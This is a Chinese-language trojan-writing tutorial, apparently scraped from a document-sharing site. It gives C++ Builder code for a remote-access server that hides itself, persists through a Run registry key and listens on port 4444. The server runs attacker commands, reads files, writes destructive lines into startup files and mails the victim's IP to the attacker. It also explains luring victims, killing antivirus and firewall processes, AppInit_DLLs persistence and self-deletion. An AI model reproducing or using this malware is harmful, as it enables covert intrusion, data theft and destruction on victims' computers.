木马编写详细教程,慎用(1)(1)

{

DWORD dwVersion = GetVersion（）;

// 得到操作系统的版本号

if （dwVersion >= 0x80000000）

// 操作系统是Win9x，不是WinNt

　{

typedef DWORD （CALLBACK* LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;

//定义RegisterServiceProcess（）函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary（"KERNEL32"）;

//加载RegisterServiceProcess（）函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = （LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;

//得到RegisterServiceProcess（）函数的地址

lpRegisterServiceProcess（GetCurrentProcessId（）,1）;

//执行RegisterServiceProcess（）函数,隐藏本进程

FreeLibrary（hDLL）;

//卸载动态链接库

　}

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。

　接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

{　
char TempPath[MAX_PATH];
//定义一个变量
GetSystemDirectory（TempPath ,MAX_PATH）;
//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径
SystemPath=AnsiString（TempPath）;
//格式化TempPath字符串，使之成为能供编译器使用的样式
CopyFile（ParamStr（0）.c_str（）, AnsiString（SystemPath+"\\Tapi32.exe"）.c_str（） ,FALSE）;
//将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来
Registry=new TRegistry;
//定义一个TRegistry对象，准备修改注册表，这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//设置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey（"Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE）;
//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之
try
　{
//如果以下语句发生异常，跳至catch，以避免程序崩溃
if（Registry->ReadString（"crossbow"）!=SystemPath+"\\Tapi32.exe"）
Registry->WriteString（"crossbow",SystemPath+"\\Tapi32.exe"）;
//查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe
//如果不是，就写入以上键值和内容
　}
catch（...）
　{
　//如果有错误，什么也不做
　}
}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边

的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{
　FILE *fp=NULL;
　char * content;
　int times_of_try;
　char TempFile[MAX_PATH];
　//定义了一堆待会儿要用到的变量
　sprintf（TempFile, "%s", AnsiString（SystemPath+AnsiString（"\\Win369.BAT"））.c_str（））;
　//在%System%下建立一个文本文件Win369.bat，作为临时文件使用
　AnsiString temp=Socket->ReceiveText（）;
　//接收客户端（攻击者，也就是你自己）传来的数据
}

　好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

{
if（temp.SubString（0,9）=="edit conf"）
　//如果接受到的字符串的前9个字符是“edit conf”
　{
int number=temp.Length（）;
//得到字符串的长度
int file_name=atoi（（temp.SubString（11,1））.c_str（））;
//将第11个字符转换成integer型，存入file_name变量
//为什么要取第11个字符，因为第10个字符是空格字符
content=（temp.SubString（12,number-11）+'\n'）.c_str（）;
//余下的字符串将被作为写入的内容写入目标文件
FILE *fp=NULL;
char filename[20];
chmod（"c:\\autoexec.bat",S_IREAD|S_IWRITE）;
chmod（"c:\\config.sys",S_IREAD|S_IWRITE）;
//将两个目标文件的属性改为可读可写
if（file_name==1）
sprintf（filename,"%s","c:\\autoexec.bat"）;
//如果第11个字符是1,就把Autoexec.bat格式化
else if（file_name==2）
sprintf（filename,"%s","c:\\config.sys"）;
//如果第11个字符是1,就把Config.sys格式化
times_of_try=0;
//定义计数器
while（fp==NULL）
{
//如果指针是空
fp=fopen（filename,"a+"）;
//如果文件不存在，创建之；如果存在，准备在其后添加
//如果出错，文件指针为空，这样就会重复
times_of_try=times_of_try+1;
//计数器加1
if（times_of_try>100）
{
　

//如果已经试了100次了，仍未成功
Socket->SendText（"Fail By Open File"）;
//就发回“Fail By Open File”的错误信息
goto END;
//跳至END处
}
}
fwrite（content,sizeof（char）,strlen（content）,fp）;
//写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！
fclose（fp）;
//写完后关闭目标文件
Socket->SendText（"Sucess"）;
//然后发回“Success”的成功信息
}
}

你现在可以通过网络来察看目标机上的这两个文件了，并且还可以向里面随意添加任何命令。呵呵，这只不过是牛刀小试罢了。朋友，别走开！（未完待续）

上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲啰：

{

else if（temp.SubString（0，3）=="dir"）

{

//如果前3个字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length（）;

//得到字符串的长度

AnsiString Dir_Name=temp.SubString（5，number-3）;

//从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if（Dir_Name==""）

{

//如果目录名为空

Socket->SendText（"Fail By Open DIR's Name"）;

//返回“Fail By Open DIR's Name”信息

goto END;

//跳到END

}

char * dirname;

dirname=Dir_Name.c_str（）;

if （（dir = opendir（dirname）） == NULL）

{

//如果打开目录出错

Socket->SendText（"Fail by your DIR's name!"）;

//返回“Fail By Your DIR's Name”信息

goto END;

//跳到END

}

times_of_try=0;

while（fp==NULL）

{

//如果指针是NULL

fp=fopen（TempFile，"w+"）;

//就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已经试了100次了，仍未成功（真有耐心！）

Socket->SendText（"Fail By Open File"）;

//就发回“Fail By Open File”的错误信息

goto END;

//并跳到END处

}

}

while （（ent = readdir（dir）） != NULL）

{

//如果访问目标

目录成功

if（*（AnsiString（dirname））.AnsiLastChar（）!='\\'）

//如果最后一个字符不是“\”，证明不是根目录

filename=（AnsiString（dirname）+"\\"+ent->d_name）.c_str（）;

//加上“\”字符后将指针指向目录流

else

filename=（AnsiString（dirname）+ent->d_name）.c_str（）;

//如果是根目录，则不用加“\”

attrib=_rtl_chmod（filename， 0）;

//得到目标文件的访问属性

if （attrib & FA_RDONLY）

//“&”字符是比较前后两个变量，如果相同返回1，否则返回0

fwrite（" R"，sizeof（char），3，fp）;

//将目标文件属性设为只读

else

fwrite（" "，sizeof（char），3，fp）;

//失败则写入空格

if （attrib & FA_HIDDEN）

fwrite（"H"，sizeof（char），1，fp）;

//将目标文件属性设为隐藏

else

fwrite（" "，sizeof（char），1，fp）;

//失败则写入空格

if （attrib & FA_SYSTEM）

fwrite（"S"，sizeof（char），1，fp）;

//将目标文件属性设为系统

else

fwrite（" "，sizeof（char），1，fp）;

//失败则写入空格

if （attrib & FA_ARCH）

fwrite（"A"，sizeof（char），1，fp）;

//将目标文件属性设为普通

else

fwrite（" "，sizeof（char），1，fp）;

//失败则写入空格

if （attrib & FA_DIREC）

fwrite（"

"，sizeof（char），9，fp）;

//将目标文件属性设为目录

else

fwrite（" "，sizeof（char），9，fp）;

//失败则写入空格

fwrite（ent->d_name，sizeof（char），strlen（ent->d_name），fp）;

//将目录名写入目标文件

fwrite（CR_LF，1，1，fp）;

//写入换行

}

fclose（fp）;

//关闭文件

closedir（dir）;

//关闭目录

FILE *fp1=NULL;

times_of_try=0;

while（fp1==NULL）

{

fp1=fopen（TempFile，"r"）;

//打开Win369.bat准备读

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已经试了100次了，仍未成功

Socket->SendText（"Fail By Open File"）;

//

就发回“Fail By Open File”的错误信息

goto END;

//并跳到END处

}

}

AnsiString Return_Text="";

char temp_content[300];

for（int i=0;i<300;i++） temp_content[i]='\0';

//定义的一个空数组

Read_Num=fread（temp_content，1，300，fp1）;

//从目标文件中读入前300个字符

while（Read_Num==300）

{

Return_Text=Return_Text+temp_content;

//Return_Text变量加上刚才的300个字符

for（int i=0;i<300;i++） temp_content[i]='\0';

Read_Num=fread（temp_content，1，300，fp1）;

//重复

};

Return_Text=Return_Text+temp_content;

//Return_Text变量加上刚才的300个字符

fclose（fp1）;

//关闭目标文件

Socket->SendText（Return_Text）;

//返回Return_Text变量的内容

}

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if（temp.SubString（0，4）=="type"）

{

//如果前4个字符是“type”

int Read_Num;

int number=temp.Length（）;

AnsiString File_Name=temp.SubString（6，number-4）;

//将目标文件流存入File_Name变量中

times_of_try=0;

while（fp==NULL）

{

fp=fopen（File_Name.c_str（），"r"）;

//打开目标文件准备读

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已试了100次了

Socket->SendText（"Fail By Open File"）;

//返回“Fail By Open File”的错误信息

goto END;

//跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for（int i=0;i<300;i++） temp_content[i]='\0';

//定义一个空数组

Read_Num=fread（temp_content，1，300，fp）;

//从目标文件中读入前300个字符

while（Read_Num==300）

{

Return_Text=Return_Text+temp_content;

//Return_Text的内容加上刚才的字符

for（int i=0;i<300;i++） temp_content[i]='\0';

Read_Num=fread（temp_content，1，300，fp）;

//重复

};

Return_Text=Return_Text+temp_content;

//Return_Text的内容加上刚才的字符

fclose（fp）;

//关闭目标文件

Socket->SendText（Return_Text）;

//返回Ret

urn_Text的内容，即你查看文件的内容

}

}

咳咳！累死了！还是来点轻松的吧——操纵目标机的光驱（注意：mciSendString（）函数的声明在mmsystem.h头文件中）：

{

else if（temp=="open"）

{

//如果收到的temp的内容是“open”

mciSendString（"set cdaudio door open"， NULL， 0， NULL）;

//就弹出光驱的托盘

}

else if（temp=="close"）

{

//如果收到的temp的内容是“close”

mciSendString（"Set cdaudio door closed wait"， NULL， 0， NULL）;

//就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

}

接着就是交换目标机的鼠标左右键，代码如下：
{
else if（temp=="swap"）
{
SwapMouseButton（1）;
//交换鼠标左右键，简单吧？
}
}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x——NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{
else if（temp=="reboot"）
{
//如果收到的temp的内容是“temp”
DWORD dwVersion = GetVersion（）;
//得到操作系统的版本号
if （dwVersion < 0x80000000）
{
//操作系统是WinNt，不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
//定义变量
OpenProcessToken（GetCurrentProcess（），TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY， &hToken）;
//OpenProcessToken（）这个函数的作用是打开一个进程的访问令牌
//GetCurrentProcess（）函数的作用是得到本进程的句柄
LookupPrivilegeValue（NULL， SE_SHUTDOWN_NAME，&tkp.Privileges[0].Luid）;
//LookupPrivilegeValue（）的作用是修改进程的权限
tkp.PrivilegeCount = 1;
//赋给本进程特权
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges（hToken， FALSE， &tkp， 0，（PTOKEN_PRIVILEGES）NULL， 0）;
//AdjustTokenPrivileges（）的作用是通知Windows NT修改本进程的权利
ExitWindowsEx（EWX_REBOOT | EWX_FORCE， 0）;
//强行退出WinNt并重启
}
else ExitWindowsEx（EWX_FORCE+EWX_REBOOT，0）;
//强行退出Win9x并重启
}
}

　如果以上都不是，就让它在Dos窗口中执行传来的命令：

{
else
{
//如果都不是
char * CR_TF="\n";
times_of_try=0;
while（fp==NULL）
{
fp=fopen（TempFile，"w+"）;
//创建Win369.bat，如果已存在就覆盖
times_of_try=times_of_try+1;
//计数器加1
if（times_of_try>100）
{
Socket->SendText（"Fail By Open File"）;
//返回“Fail By Open File”的

信息
goto END;
//跳到END
}
}
fwrite（temp.c_str（），sizeof（char），strlen（temp.c_str（）），fp）;
//写入欲执行的命令
fwrite（CR_TF，sizeof（char），strlen（CR_TF），fp）;
//写入换行符
fclose（fp）;
//关闭Win369.bat
system（TempFile）;
//执行Win369.bat
Socket->SendText（"Success"）;
//返回“Success”信息
}
}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。

到此，服务器程序的功能已全部完成，但还差容错部分未完成，这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）

上次已编写完服务器端的各种功能，但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

{

END:;

　Socket-〉Close（）;

　//关闭服务

　ServerSocket1-〉Active =true;

　//再次打开服务

　if （NMSMTP1-〉Connected） NMSMTP1-〉Disconnect（）;

　//如果SMTP服务器已连接则断开

　NMSMTP1-〉Host = "https://www.doczj.com/doc/eb15709481.html,";

　//选一个好用的SMTP服务器，如163、263、sina和btamail

　NMSMTP1-〉UserID = "";

　//你SMTP的ID

　try

　{

NMSMTP1-〉Connect（）;

//再次连接

　}

　catch（...）

　{

goto NextTime;

//跳到NextTime

　}

　NMSMTP1-〉PostMessage-〉FromAddress ="I don't know!";

　//受害者的Email地址

　NMSMTP1-〉PostMessage-〉FromName = "Casualty";

　//受害者的名字

　NMSMTP1-〉PostMessage-〉ToAddress-〉Text = "crossbow@https://www.doczj.com/doc/eb15709481.html,";

　//将信发到我的邮箱，这一步很关键

　NMSMTP1-〉PostMessage-〉Body-〉Text = AnsiString（"Server Running on:"） + NMSMTP1-〉LocalIP ;

　//信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

　NMSMTP1-〉PostMessage-〉Subject = "Server Running Now!";

　//信的主题

　NMSMTP1-〉SendMail（）;

　//发送！

　return;

　//返回

NextTime:

　NMFTP1-〉Host = "https://www.doczj.com/doc/eb15709481.html,";

　//你的FTP服务器的地址

　NMFTP1-〉UserID = "";

　//你的用户ID

　NMFTP1-〉Port = 21;

　//FTP端口号，一般为21

　NMFTP1-〉Password = "";

　//你的FTP的密码

　if（NMFTP1-〉Connected） NMFTP1-〉Disconnect（）;

　//如果已连接就断开

　try

{

NMFTP1-〉Connect（）;

//再连接

}

　catch（...）

{

return;

//返回

}

　AnsiString SendToSite = "Server Running on: " + NMFTP1-〉RemoteIP;

　//受害者的IP地址

　FILE * Upload;

　Upload = fopen（NMFTP1-〉RemoteIP.c_s

tr（）,"w+"）;

　//创建一个新文件准备写，如果已存在就覆盖

　fwrite（SendToSite.c_str（）,sizeof（char）,SendToSite.Length（）,Upload）;

　//写入以上的SendToSite的内容

　fclose（Upload）;

　//写完后关闭此文件

　NMFTP1-〉RemoveDir（"public_html"）;

　//删除public_html目录

　NMFTP1-〉Upload（NMFTP1-〉RemoteIP, NMFTP1-〉RemoteIP）;

　//上传！

啊，超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件：

#include 〈stdlib.h〉
#include 〈dirent.h〉
#include 〈fcntl.h〉
#include 〈dos.h〉
#include 〈sys\stat.h〉
#include 〈winbase.h〉
#include 〈stdio.h〉
#include 〈process.h〉
#include 〈io.h〉
#include 〈mmsystem.h〉

至此，服务器端（Server）程序已全部完工！（终于可以好好歇歇了！）别慌！以上代码只是完成了整个木马程序的一半。（“扑通”，有人晕倒了！）下面我们就将乘胜追击——搞定客户端程序（Client）！

客户端程序其实是很简单的。另新建一个Form，添加一个ClientSocket（和ServerSocket在相同的页下），再添加四个Editbox，命名为Edit1，Edit2，Edit3和Edit4，最后添加一个Button，Caption为“发送”。Edit1是输入命令用的，Edit2是准备输入目标机的IP地址用的，Edit3是输入连接端口号用的，Edit4是用来输入欲添加的语句或显示命令执行的结果的。（头是不是有点大了？！）

双击Button1，在Button1Click事件中添加如下代码：

{
if（（Edit2-〉Text==""）||（Edit3-〉Text==""））return;
//如果输入IP地址框或输入端口号框有一个为空，就什么也不作
ClientSocket1-〉Address=Edit2-〉Text;
//目标IP地址
ClientSocket1-〉Port=atoi（Edit2-〉Text.c_str（））;
//目标端口号，本例中的44444
ClientSocket1-〉Open（）;
//连接！

选中CilentSocket1控件，双击OnConnectt事件，在ClientSocket1Connect下添加如下代码：
{

　if（（Edit1-〉Text=="edit conf 1"）||（Edit1-〉Text=="edit conf 2"））

　//如果是要编辑autoexec.bat或config.sys

Socket-〉SendText（Edit1-〉Text+Edit4-〉Text）;

//发送命令和欲添加的语句

　else

Socket-〉SendText（Edit1-〉Text）;

//否则只发送命令

}

双击OnRead事件，在ClientSocket1Read下添加如下代码：

{

　AnsiString ReadIn = Socket-〉ReceiveText（）;

　//读入收到的返回信息

　Edit4-〉Text="";

　//清空编辑框

　FILE *fp;

　fp = fopen（"ReadIn.tmp","w"）;

　//建立一个临时文件ReadIn.tmp

　fwrite（ReadIn.c_str（）,1,10000,fp）;

　//写入信息

　fclose（fp）;

　//关闭之

　Edit4-〉Lines-〉LoadFromFile（"ReadIn.tmp"）;

　//在

编辑框中显示返回的信息

}

为了敲完命令后直接回车就可以发送，我们可以使Button1的代码共享。双击Edit1的OnKeyPress命令，输入：

{

　if（Key==VK_RETURN）Button1Click（Sender）;

　//如果敲的是回车键，就和点击Button1一样的效果

}

最后再添加以下头文件：

#include "stdlib.h"

#include "winbase.h"

#include "fcntl.h"

#include "stdio.h"

终于写完了！！！（如果你对简陋的界面不满意，可以自己用BCB中丰富的控件好好完善完善嘛！）按下Ctrl+F9进行编译链接吧！对于Server，你可以选一个足以迷惑人的图标（我选的是一个目录模样的图标）进行编译，这样不但受害者容易中招，而且便于隐藏自己。

接下来就把Server程序寄给受害者，诱骗他（她）执行，在你得到他（她）的IP后（这不用我教吧？），就启动Client程序，敲入“edit conf 1”就编辑Autoexec.bat文件，敲入“edit conf 2”就编辑Config.sys文件，敲入“dir xxx”（xxx是目录名）就可以看到目录和文件，敲“type xxx”就可以察看任何文件，输入“open”，弹出目标机的光驱托盘，“close”就收入托盘，输入“swap”就可以交换受害者的鼠标左右键，输入“reboot”就启动目标机……不用我多说了吧？

以上只是一个简单的例子，真正写起木马来要解决的技术问题比这多得多，这得需要扎实的编程功底和丰富的经验。如下的问题就值得仔细考虑：

首先是程序的大小问题，本程序经编译链接后得到的可执行文件竟有400多K，用Aspack1.07压了一下也还有200多K。可以看出不必要的Form是应该去掉的；并且尽量由自己调用底层的API函数，而尽量少使用Borland打好包的VCL控件；要尽量使用汇编语言（BCB支持C++和汇编混编），不但速度会加快，而且大小可以小很多，毕竟木马是越小越好。

还有启动方式的选择。出了Win.ini、System.ini之外，也还是那几个注册表键值，如：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了（如冰河和广外女生）。这里涉及到参数传递的问题。得到ParamStr（）函数传来的参数，启动自己后再启动与之关联的程序，并将参数传递给它，这样就完成了一次“双启动”，而受害者丝毫感觉不到有任何异常。具体键值如：

与exe文件建立关联：HKEY_CLASSES_ROOT\exefile\shell\open\command
与txt文件建立关联：HKEY_CLASSES_ROOT\txtfile\shell\open\command
与dll文件建立关联：HKEY_CLASSES_ROOT\dllf

ile\shell\open\command

等，当然还可以自己扩充。目前还有一种新方法：在

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Windows下添加如下键值 "AppInit_DLLs"="Server.dll"，这就把Server.dll注册为系统启动时必须加载的模块（你应该把木马编译成DLL）。下次开机时，木马以动态链接库形式被加载，存在于系统进程中。因为没有它自己的PID（Process ID 进程识别号），所以在NT的任务管理器中也看不见（不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的），这样做的目的是可以使自己的程序更加隐蔽，提高木马的生存能力。

木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件，截图存为jpg文件传回，录音监听成Wav文件，录像成AVI文件，弹光驱，读软驱，关机，重启，不停地挂起，胡乱切换分辨率（烧掉你的显示器），发对话框，不停地打开资源管理器直到死机，杀掉Kernel32.dll进程使机器暴死，交换鼠标左右键，固定鼠标，限制鼠标活动范围，鼠标不听指挥到处乱窜，记录击键记录（记录上网口令，这需要深入了解钩子（Hook）技术，如键盘钩子和鼠标钩子），窃取重要的密码文件如pwl和sam文件，格式化磁盘，乱写磁盘扇区（像病毒大爆发），破坏零磁道，乱写BIOS（像CIH），胡乱设置CMOS，加密MBR、HDPT和FAT（像江民炸弹）……真是琳琅满目、心狠手辣呀！而且实现起来并不是很复杂，只不过后面几项需要比较扎实的汇编功底而已（有几项要用到Vxd技术）。唉！路漫漫其修远兮，吾将上下而求索……

如果你想更安全地执行你的入侵活动，就应该像广外女生一样可以杀掉防火墙和杀毒软件的进程。防火墙和杀毒软件监视的是特征码，如果你是新木马，它就不吱一声；但是如果你打开不寻常的端口，它就会跳出来报警。因此最好的办法是启动后立即分析当前进程，查找有没有常见防火墙和杀毒软件的进程，如果有就杀无赦。比如常见的如：Lockdown，天网防火墙，网络卫兵，kv3000，瑞星，金山毒霸，Pc-Cillin，Panda，Mcafee，Norton和CheckPoint。杀掉后，再在特定的内存地址中作一个标记，使它们误以为自己已启动，因此不会再次启动自己了。

针对来自反汇编工具的威胁。如果有人试图将你的木马程序反汇编，他成功后，你的一切秘密就暴露在他的面前了，因此，我们要想办法保护自己的作品。首先想到的是条件跳转，条件跳转对于反向工程来说并不有趣。没有循环，只是跳转，作为使偷窃者令人头痛的路障。这样，就没有

简单的反向操作可以执行了。陷阱，另一个我不太肯定，但听说有程序使用的方法：用CRC校验你的EXE文件，如果它被改变了，不要显示典型错误信息，而给予偷窃者致命的一击。

最后如果你需要它完成任务后可以自己删除自己，我提示你：退出前建立一个批处理文件，加入循环删除本exe文件和本批处理文件自己的命令后保存，执行它，再放心地退出。你可以试一下，所有文件都消失了吧？！这叫“踏雪无痕”。

入侵安装了防火墙的机器最好使用自己编写的木马，这样不光防火墙不会报警，而且你自己心里也坦然一些——毕竟是自己的作品吗！如果你是系统管理员，那就请你不要偷懒，不仅要经常扫描1024以下的端口，而且包括1024以上的高端端口也要仔细扫描，65535个端口一个也不能漏。因为许多木马打开的就是高端端口（如本例中的4444）。